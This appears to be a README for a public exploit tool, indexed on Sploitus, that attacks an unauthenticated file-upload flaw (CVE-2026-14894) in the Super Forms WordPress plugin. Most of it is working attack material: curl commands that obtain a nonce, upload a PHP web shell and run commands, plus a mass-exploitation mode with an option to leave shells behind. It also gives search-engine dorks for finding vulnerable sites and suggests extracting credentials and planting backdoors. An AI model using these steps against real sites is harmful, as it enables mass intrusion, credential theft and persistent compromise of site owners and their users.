Share
## https://sploitus.com/exploit?id=4C23137B-317F-58A9-9B40-36E3F53FF075
CVE-2026-14894 โ€” Super Forms Unauthenticated File Upload RCE
Nonce Leak โ†’ datauristring Upload โ†’ Code Execution

---

## Overview

**CVE-2026-14894** is a critical-severity (CVSS 9.8) **unauthenticated** arbitrary file upload vulnerability in the **Super Forms โ€“ Drag & Drop Form Builder** WordPress plugin (by WebRehab) versions **โ‰ค 6.3.313**.

The `super_submit_form` nopriv AJAX handler accepts file uploads via form submissions without:
1. Verifying the user is authenticated
2. Validating the file type or extension
3. Checking the MIME content against magic bytes

The nonce barrier is trivially bypassed โ€” a separate nopriv AJAX handler (`super_create_nonce`) generates valid nonces for any unauthenticated visitor.

Attackers upload **arbitrary PHP files** via Base64-encoded `datauristring` payloads that are written directly to `/wp-content/uploads/superforms/` with the attacker-controlled filename โ€” resulting in direct code execution.

### Affected Versions

| Version | Status |
|---|---|
| โ‰ค 6.3.313 | Vulnerable |
| 6.3.314+ | Patched |

> **Active installs:** 600,000+  
> **Discovered by:** andrea bocchetti via Wordfence (July 7, 2026)

---

## Vulnerability Mechanism

### Root Cause

Three missing security checks in Super Forms' AJAX file upload handler:

```php
// Vulnerable: nopriv AJAX โ€” no auth, no file type validation, no MIME check
add_action('wp_ajax_nopriv_super_create_nonce', 'super_create_nonce');  // nonce for anyone
add_action('wp_ajax_nopriv_super_submit_form', 'super_submit_form');   // upload for anyone

function super_submit_form() {
    $data = json_decode(stripslashes($_POST['data']), true);
    $file = $data['sf_upload_field']['files'][0];
    $content = base64_decode($file['datauristring']);  // no MIME validation
    $name = $file['value'];                             // no filename sanitization
    fwrite(fopen($upload_path . $name, 'w'), $content); // PHP written to disk
}
```

### Nonce Bypass

```php
// Anyone can get a valid nonce โ€” no authentication required
function super_create_nonce() {
    $nonce = md5(uniqid(rand(), true));
    $_SESSION['sf_nonce'] = $nonce;
    echo $nonce;  // returned to unauthenticated attacker
}
```

### Attack Flow

```
1. POST /wp-admin/admin-ajax.php?action=super_create_nonce
   โ†’ Get valid nonce (no auth needed)

2. POST /wp-admin/admin-ajax.php?action=super_submit_form
   sf_nonce=NONCE&form_id=1&data={"sf_upload_field":{"files":[{
     "datauristring":"data:image/png;base64,PD9waHAgc3lzdGVt...",
     "value":"shell.php"}]}}
   โ†’ Shell written to /wp-content/uploads/superforms/

3. GET /wp-content/uploads/superforms/shell.php?c=id
   โ†’ RCE confirmed
```

---

## Installation

```bash
git clone https://github.com/shinthink/CVE-2026-14894.git
cd CVE-2026-14894
pip install -r requirements.txt
```

---

## Usage

```bash
# Single target
python cve_2026_14894.py -t target.com

# Mass exploit
python cve_2026_14894.py -f targets.txt

# Mass exploit + save results
python cve_2026_14894.py -f targets.txt -o shells.txt

# Leave shells on target
python cve_2026_14894.py -t target.com --no-cleanup

# Debug mode (show every request)
python cve_2026_14894.py -t target.com --debug
```

### Arguments

```
  -t, --target      Single target (domain or IP)
  -f, --file        Target list, one per line
  -o, --output      Save RCE results to file
  --threads         Concurrent workers (default: 30)
  --no-cleanup      Leave shells on target
  --debug           Show every HTTP request + stage in real-time
  -v, --verbose     Show detailed output
```

---

## Proof of Concept

### Single Target

```bash
$ python cve_2026_14894.py -t target.com --debug
```

```
  Super Forms | CVE-2026-14894 | CVSS 9.8

  [target.com] [+] Super Forms detected v6.3.312
  [target.com] [*] Nonce obtained
  [target.com] [*] Uploading shell...
  [target.com] [!] RCE confirmed

  Host       : target.com
  SuperForms : YES v6.3.312
  Upload     : YES
  RCE        : YES
  Shell      : https://target.com/wp-content/uploads/superforms/think_abc.php?t=TOKEN
  Output     : uid=33(www-data) gid=33(www-data)
  Time       : 2.1s
```

### Mass Scan

```
  Targets: 2500  |  Threads: 30

  [RCE]    target-vuln-01.com                                 2.1s  v6.3.312
  [UP]     target-patched-02.com                              1.8s  v6.3.314 (upload blocked)
  [!]      target-no-plugin-03.com                            0.5s  not installed
  [150/2500] 6%  |  SuperForms:47  Upload:18  RCE:12

  โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€
  Done | 180s | Targets:2500 Det:47 Upload:18 RCE:12
```

### Manual Exploitation

**Step 1 โ€” Obtain nonce**
```bash
curl -sk -X POST 'https://target.com/wp-admin/admin-ajax.php' \
  -d 'action=super_create_nonce'
# Returns 96-char hex nonce
```

**Step 2 โ€” Upload PHP shell**
```bash
NONCE="abc123..."
SHELL_B64=$(echo '' | base64 -w0)

curl -sk -X POST 'https://target.com/wp-admin/admin-ajax.php' \
  -d 'action=super_submit_form' \
  -d "sf_nonce=$NONCE" \
  -d 'form_id=1' \
  -d 'data={"sf_upload_field":{"type":"files","files":[{"datauristring":"data:image/png;base64,'$SHELL_B64'","value":"shell.php","name":"shell.php","label":"attachment"}]}}'
```

**Step 3 โ€” Execute commands**
```bash
curl -sk 'https://target.com/wp-content/uploads/superforms/shell.php?c=id'
```

---

## FOFA Dork

```
body="wp-content/plugins/super-forms"
```

## Shodan

```
http.html:"super-forms"
```

---

## Impact

Successful exploitation yields **remote code execution as the web server user**. From there:

- Extract `wp-config.php` โ†’ database credentials
- Access all WordPress content, users, and plugin data
- Deploy persistent backdoors
- Pivot to internal networks

---

## Disclaimer

> **FOR EDUCATIONAL AND AUTHORIZED TESTING PURPOSES ONLY.**
>
> This software is intended for security professionals conducting authorized penetration tests, organizations auditing their own infrastructure, and researchers studying vulnerability exploitation.
>
> Unauthorized access to computer systems is illegal and may violate:
> - United States: Computer Fraud and Abuse Act (18 U.S.C. 1030)
> - Indonesia: UU ITE Pasal 30 & 46
> - European Union: Directive 2013/40/EU
> - United Kingdom: Computer Misuse Act 1990
>
> The authors assume no liability for misuse.

---

## References

| Resource | Link |
|---|---|
| Wordfence Advisory | [wordfence.com](https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/super-forms/super-forms-63313-unauthenticated-arbitrary-file-upload-via-data-parameter-datauristring-value) |
| IONIX Advisory | [ionix.io](https://www.ionix.io/threat-center/cve-2026-14894/) |
| NVD Entry | [CVE-2026-14894](https://nvd.nist.gov/vuln/detail/CVE-2026-14894) |
| Researcher | andrea bocchetti |

---


  This project is not affiliated with WebRehab or Super Forms.